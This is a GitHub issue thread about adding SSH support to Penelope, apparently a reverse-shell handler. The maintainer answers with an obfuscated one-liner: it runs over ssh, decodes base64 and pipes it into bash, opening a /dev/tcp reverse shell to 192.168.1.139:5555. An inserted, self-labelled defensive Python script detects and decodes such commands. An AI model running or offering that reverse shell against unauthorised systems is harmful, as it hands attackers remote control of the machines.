
Feature Suggestion: Direct SSH Support

Open bamuwe opened this issue 8 months ago • 1 comments

Penelope currently supports reverse shells really well, and the upload/download features are super useful. However, to use Penelope as a kind of SSH session manager, I currently have to:

First SSH into a machine → Then establish a reverse shell back to my attack box

It would be amazing if Penelope could directly SSH into a target host, just like pwncat or even Paramiko-based session managers. This would allow for seamless session management via SSH without requiring a reverse shell as a prerequisite.

Thanks again for this brilliant tool. Looking forward to future updates — and would be happy to help test new features if needed!

Best regards

bamuwe avatar Apr 18 '25 14:04 bamuwe

Hi @bamuwe, thank you very much for your kind words! Could you please tell me how you would like this feature to run exactly? For the moment you can run penelope -a, copy the bash tcp payload and do something like this:

ssh <ssh_server> "printf KGJhc2ggPiYgL2Rldi90Y3AvMTkyLjE2OC4xLjEzOS81NTU1IDA+JjEpICY=|base64 -d|bash"

and you get a shell. I think this is the easiest way because it leaves everything to the ssh binary. It takes care of all the non-standard ssh server configurations. If you have any better idea I am happy to hear!

brightio avatar Jun 01 '25 22:06 brightio
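From the defender's side, the ssh one-liner above (a base64 blob piped into `base64 -d` and then into a shell) is exactly the shape of command line worth alerting on in process-creation or auditd logs. The following is an added example, not code from the Penelope project or from anyone in this thread: it spots that pattern in a command line, decodes the payload, and pulls out the `/dev/tcp` callback host and port; the command lines below are constructed samples (the first reuses the thread's payload with a made-up hostname).

```python
import base64
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample command lines, as a process-creation or auditd record might show them.
# The first is the one-liner from this thread with a made-up hostname in place of <ssh_server>.
SAMPLE_CMDLINES = [
    'ssh host.example.internal "printf KGJhc2ggPiYgL2Rldi90Y3AvMTkyLjE2OC4xLjEzOS81NTU1IDA+JjEpICY=|base64 -d|bash"',
    'ssh host.example.internal "uptime"',
    "echo aGVsbG8gd29ybGQ=|base64 -d",
]

# A run of base64 text piped through `base64 -d`/`--decode` straight into a shell interpreter.
B64_TO_SHELL = re.compile(
    r"([A-Za-z0-9+/]{16,}={0,2})\s*\|\s*base64\s+(?:-d|--decode)\s*\|\s*(?:bash|sh|zsh|dash)\b"
)
# bash's /dev/tcp and /dev/udp pseudo-devices: /dev/tcp/<host>/<port>
DEV_TCP = re.compile(r"/dev/(tcp|udp)/([^/\s]+)/(\d{1,5})")


@dataclass
class Finding:
    decoded: str                 # the decoded payload, for the analyst to read
    proto: Optional[str]         # "tcp" / "udp" when a /dev/tcp-style callback is present
    host: Optional[str]
    port: Optional[int]


def inspect_cmdline(cmdline: str) -> Optional[Finding]:
    """Return a Finding if the command line decodes base64 into a shell, else None."""
    m = B64_TO_SHELL.search(cmdline)
    if not m:
        return None
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:           # binascii.Error is a ValueError subclass
        return None
    t = DEV_TCP.search(decoded)
    if t:
        return Finding(decoded, t.group(1), t.group(2), int(t.group(3)))
    return Finding(decoded, None, None, None)


def scan(cmdlines: List[str]) -> List[Tuple[str, Finding]]:
    """Run inspect_cmdline over a batch and keep only the hits."""
    hits = []
    for line in cmdlines:
        f = inspect_cmdline(line)
        if f is not None:
            hits.append((line, f))
    return hits
```

On the samples above only the first line is flagged, with the decoded payload and the 192.168.1.139:5555 callback extracted; a plain `ssh ... "uptime"` and a base64 decode that is not piped into a shell are left alone.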

Hey, that's a great idea! I actually never thought about using the original ssh before — but you're right, it's simpler and more robust. Maybe we could add this suggestion to the README so more people are aware of it. 😄 Thanks again!

bamuwe avatar Jun 04 '25 07:06 bamuwe

Hi @bamuwe, I added a new feature in commit 1a1f330. Please check the changes in the README for how to use it. I am waiting for feedback. Thanks again!

brightio avatar Jul 07 '25 16:07 brightio